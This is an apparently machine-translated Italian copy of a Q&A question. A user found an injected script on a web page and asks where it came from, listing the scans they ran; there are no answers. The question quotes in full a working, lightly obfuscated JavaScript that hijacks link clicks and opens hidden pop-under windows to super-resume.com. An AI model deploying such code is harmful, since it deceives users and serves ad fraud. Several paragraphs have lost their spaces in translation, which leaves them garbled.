Tracciamento della fonte del malware del browser (se si tratta di malware di per sé) [chiuso]

2

I'm on a pagina che presenta malware, sotto forma di questo codice che viene eseguito quando faccio clic sul link a http://www-users.york.ac.uk/~raa110/audacity/AudacityHelp.html#DMA - che è stato un 404 dal mio primo tentativo ma l'iniezione di malware si verifica prima ancora che la pagina venga aperta :

(function(){var f='www.super-resume.com/#__';f='https://href.li/?http://'+f;function hasLocalStorage(){try{localStorage.setItem('a','a');localStorage.removeItem('a');return true}catch(e){return false}};if(!document.addEventListener||!hasLocalStorage())return;var g=window.has_more_ads||window.has_st||(document.referrer&&document.referrer.match(/(:\/\/www\.(google|bing)\.|search\.(yahoo|ask)\.com\/)/i));var h=!document.location.href.match(/^http:\/\/(spssx-discussion|rhodes--22|vtk\.1045678|itk-users\.7|astronomia-e-astrofotos\.1069742|jsmastronomy.30143|jsmtst.2343515)\./);var j=!Nabble||!Nabble.isEmbedded;if(!g||!h||!j)return;if(!localStorage.dwp){$('td.footer-right').prepend('<span id="dis'+'ablep'+'op0"><a id="dis'+'ablep'+'op1" href="javascript:void(0)">Disa'+'ble Po'+'pup A'+'ds</a> | </span>');$('#dis'+'ablep'+'op1').click(function(){localStorage.dwp=1;typeof notice=='function'&&notice('Po'+'pup ads have been dis'+'abled',3000,1000);$('#dis'+'ablep'+'op0').remove()})}var k=localStorage.st;var l=new Date().getTime();var m=60*60*1000;var n=!k||l>parseInt(k)+m;if(!n)return;var o='width=1,height=1,left='+(screenX+outerWidth/2)+',top='+(screenY+outerHeight/2);function safari_trigger(){document.removeEventListener('click',safari_trigger,false);var a=window.open(f,'pu_',o);var b=document.createElement('a');b.setAttribute('href','data:text/html,<scr'+'ipt>window.close();</scr'+'ipt>');b.style.display='none';document.body.appendChild(b);var c=document.createEvent('MouseEvents');c.initMouseEvent('click',true,true,window,0,0,0,0,0,true,false,false,true,0,null);b.dispatchEvent(c);document.body.removeChild(b)};function firefox_trigger(){document.removeEventListener('click',firefox_trigger,false);var a=window.open(f,'pu_',o);if(a){a.blur();try{var b=a.window.open('about:blank');b.close()}catch(i){};window.focus()}};function simple_trigger(){document.removeEventListener('click',simple_trigger,false);var a=window.open(f,'pu_',o);if(a){a.blur();window.focus()}};function chrome_trigger(b){var a=b.currentTarget;var c=a.href;a.href=f;window.open(c,'_blank')};function ready(a){if(document.readyState!='loading')a();else document.addEventListener('DOMContentLoaded',a)};ready(function(){var a=navigator.userAgent;var b=a.indexOf('Chrome')>=0?chrome_trigger:a.indexOf('Firefox')>=0?firefox_trigger:a.indexOf('MSIE')>=0||a.indexOf('Trident/')>=0?chrome_trigger:a.indexOf('iPhone')>=0?chrome_trigger:a.indexOf('Safari')>=0?safari_trigger:false;if(b){var c=document.querySelectorAll('a');for(var i=0;i<c.length;i++){var d=c[i].getAttribute('href');if(d&&d.indexOf('javascript:')==-1){function _wrapper(e){localStorage.st=l;if(localStorage.dwp==1)return;b(e)};c[i].addEventListener('click',_wrapper,false)}}}})})();

Apre una piccola finestra e fa finta di fare clic su varie cose, suppongo di simulare i clic effettivi del browser dell'utente per truffare le entrate pubblicitarie. Non appena fai clic su questa voce della barra delle applicazioni di pop-under per indagare, si chiude.

La mia domanda è, che cosa sta iniettando questo? Dubito che nabble.com abbia il malware, né la pagina 404 di York U; Inoltre non riesco a riprodurre questo comportamento in una finestra privata. Il riquadro dello sviluppatore dice che è anonimo (l'ho catturato facendo clic sul simbolo di pausa, quindi sul link che puoi vedere sulla pagina):

Nonhostranipluginoaddon,solociòchevienefornitoconFirefoxdiserie,oltreazoteroeadblockplus,nessunodeiqualimihacausatoproblemiprima.

Firefox51.0.1(32-bit)suWindows8.164-bit.

Aggiorna

Dopoilriavviodiuncomputeredelbrowser,ritornoallapaginanabble,interrompendoildebuggerefacendoclicsullinkoravengonomostratemoltefonti,maancoraSOURCE0,manonsembraaveremalware(oèdiversodamalware): link

aggiornamento 2

Ricerca di Spybot & Destroy non ha trovato nulla che riguardasse super-resume.com o malware, ma solo cookie di tracciamento e elenchi di file recenti.

aggiornamento 3

Programmi e funzionalità non mostrano nulla di sospetto: solo cose installate di proposito e niente di extra. Il programma installato più di recente (un giorno o due fa) era Spotify - e ho trovato questo link (non posso pubblicare, non abbastanza rep, ma secondo match su google per "malware da spotify installer", da SPOTIFY COMMUNITY FORUMS) ma dovrebbero aver già risolto il problema. Inoltre non riesco a capire perché si inietterebbero nei click handlers di Windows esistenti - quel collegamento descrive più un modello di apertura di nuove finestre del browser ogni volta che a Spotify piace, non ogni volta che l'utente fa clic su qualcosa su una pagina Web non correlata. p>     

posta user321527 10.02.2017 - 09:48
fonte

0 risposte

Leggi altre domande sui tag